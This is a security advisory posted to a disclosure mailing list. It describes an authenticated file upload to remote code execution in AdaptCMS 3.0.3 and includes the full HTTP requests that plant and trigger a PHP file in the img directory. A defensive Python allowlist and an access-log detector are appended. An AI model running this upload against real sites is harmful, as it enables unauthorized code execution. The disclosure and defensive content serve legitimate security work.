Message-ID: <CAF2Wu1bsds7qvHjT5FO5LUFJdHish3mKhd8n1J19xKWt_8dgug@mail.gmail.com>
Date: Sun, 1 Jun 2025 16:05:53 +0100
From: Andrey Stoykov <mwebsec@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Authenticated File Upload to RCE - adaptcmsv3.0.3

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File"
2. Select "Add File"
3. In the "File Contents" add the following payload "<?php phpinfo(); ?>"
4. Choose "File Extension" to be "php" and set "Folder Location" to "Images"
5. Upon uploading the file it would be available under the "img" directory

// HTTP POST request

POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream

------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"

<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"

php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"

test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"

img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]

// HTTP Response

HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

// HTTP Request triggering the webshell

GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]

// HTTP Response triggering the webshell

HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019

[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]
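The two form fields the post relies on, data[Asset][folder] and data[Asset][file_extension], are written to the webroot as supplied. The following is an added example (not AdaptCMS code) of the server-side per-folder extension allowlist that would refuse the php-in-img/ combination, together with a check over Apache access-log lines (constructed samples) that flags a script being served out of a theme asset directory. The allowlist contents, the log format and the path regexes are assumptions.

```python
import re

# Hypothetical per-folder allowlist for theme asset uploads (example code,
# not AdaptCMS's own): a folder only accepts extensions the web server
# serves as static content, so "php" under img/ is refused outright.
ALLOWED_BY_FOLDER = {
    "img": {"png", "jpg", "jpeg", "gif", "svg", "webp", "ico"},
    "css": {"css"},
    "js": {"js"},
}
# Shapes for the attacker-controlled form fields data[Asset][file_extension]
# and data[Asset][file_name]: no dots, slashes or backslashes allowed.
EXT_RE = re.compile(r"^[a-z0-9]{1,5}$")
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def validate_asset_upload(folder, file_name, file_extension):
    """True only if the folder/name/extension triple is safe to write under
    the webroot; case and whitespace are normalised so "PHP " is refused."""
    folder = folder.strip().strip("/").lower()
    ext = file_extension.strip().lower()
    name = file_name.strip()
    if folder not in ALLOWED_BY_FOLDER:
        return False
    if not EXT_RE.fullmatch(ext) or not NAME_RE.fullmatch(name):
        return False
    return ext in ALLOWED_BY_FOLDER[folder]

# Detection side: flag Apache access-log lines where a script extension is
# served with HTTP 200 out of a theme asset directory.
EXEC_EXT = {"php", "phtml", "phar", "php5", "php7", "phps"}
LOG_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
ASSET_DIR_RE = re.compile(r"^/adaptcms/app/webroot/(img|css|js)/")
# Constructed sample lines (not from the advisory); the second one mirrors
# the webshell request shown in the post.
SAMPLE_LOG = [
    '192.168.58.1 - - [30/May/2025:16:06:57 +0000] "POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1" 302 0',
    '192.168.58.1 - - [30/May/2025:16:15:36 +0000] "GET /adaptcms/app/webroot/img/test.php HTTP/1.1" 200 102019',
    '192.168.58.1 - - [30/May/2025:16:15:40 +0000] "GET /adaptcms/app/webroot/img/logo.png HTTP/1.1" 200 4410',
]

def find_served_scripts(log_lines):
    """Return request paths where a script was served from an asset folder."""
    hits = []
    for m in filter(None, (LOG_RE.search(line) for line in log_lines)):
        path = m.group("path").split("?", 1)[0]
        ext = path.rsplit(".", 1)[-1].lower()
        if ASSET_DIR_RE.match(path) and ext in EXEC_EXT and m.group("status") == "200":
            hits.append(path)
    return hits
```

Beyond the allowlist, the asset directories should also be served with script execution disabled (for example a php_admin_flag engine off or an equivalent handler removal in the web server config), so a bypass of the upload check still does not yield code execution.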